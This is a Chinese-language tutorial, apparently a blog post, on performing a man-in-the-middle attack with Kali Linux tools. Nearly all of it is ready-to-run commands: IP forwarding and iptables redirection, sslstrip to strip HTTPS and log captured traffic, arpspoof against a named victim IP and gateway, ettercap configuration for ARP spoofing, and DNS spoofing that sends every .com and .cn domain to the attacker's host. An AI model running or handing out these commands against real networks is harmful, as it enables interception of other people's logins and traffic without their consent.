当前位置: 首页 > 工具软件 > Kai > 使用案例 >

kai-linux 实现MITM功能

郭元明
2023-12-01

1. 为kali 设置开启端口转发
echo 1 >/proc/sys/net/ipv4/ip_forward 

2. 设置ssltrip , 劫持SSL数据,该设置把https 变成http
2.1 使用iptables建立端口重定向
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 2000
2.2 使用ssltrip 进行劫持 
sslstrip -l 2000 #让ssltrip 在端口2000上进行监听
tail -n 50 -f sslstrip.log# 新窗口输入该命令,查看攻击结果

3 查看网卡路由
1.ifconfig | grep "eth0" #过滤出以太网卡
2.route -n #查看充当子网网关的路由器的IP地址
  route -n | awk '{print $2}' #直接输出默认网关

arpspoof -i eth0 -t 10.10.167.3  10.10.167.1 
#受害者IP为10.10.167.3, 默认网关为10.10.167.1 , 保持该窗口,重开另外一个窗口执行其他操作

3.sslstrip -l 1000 # 新窗口中启动sslstrip 
tail -n 50 -f sslstrip.log# 新窗口输入该命令,查看攻击结果

etterca-DNS、ARP欺骗

二、ettercap
1.arp欺骗
ettercap -G
vim /etc/ettercap/etter.conf ##启用另外一个终端去编辑命令
###################################################################
/Linux ##通过这个来查找
# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"


# if you use iptables:  #将这个三个#去掉
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


:wq #保存并退出
############################################################
echo 1 >/proc/sys/net/ipv4/ip_forward


2. DNS欺骗
vim /etc/ettercap/etter.dns ##启用另外一个终端去编辑命令
################################
# microsoft sucks ;)
# redirect it to www.linux.org
#
microsoft.com      A   198.182.196.56
*.microsoft.com    A   198.182.196.56
www.microsoft.com  PTR 198.182.196.56      # Wildcards in PTR are not allowed
*.com  A 192.168.1.128# 将所有com类型的网站重定向到本机
*.cn  A 192.168.1.128# 将所有cn类型的网站重定向到本机

:wq
##########################################

ettercap -T -q -i eth0 -P dns_spoof // // # 开启DNS欺骗,// // 是所有网段

 类似资料: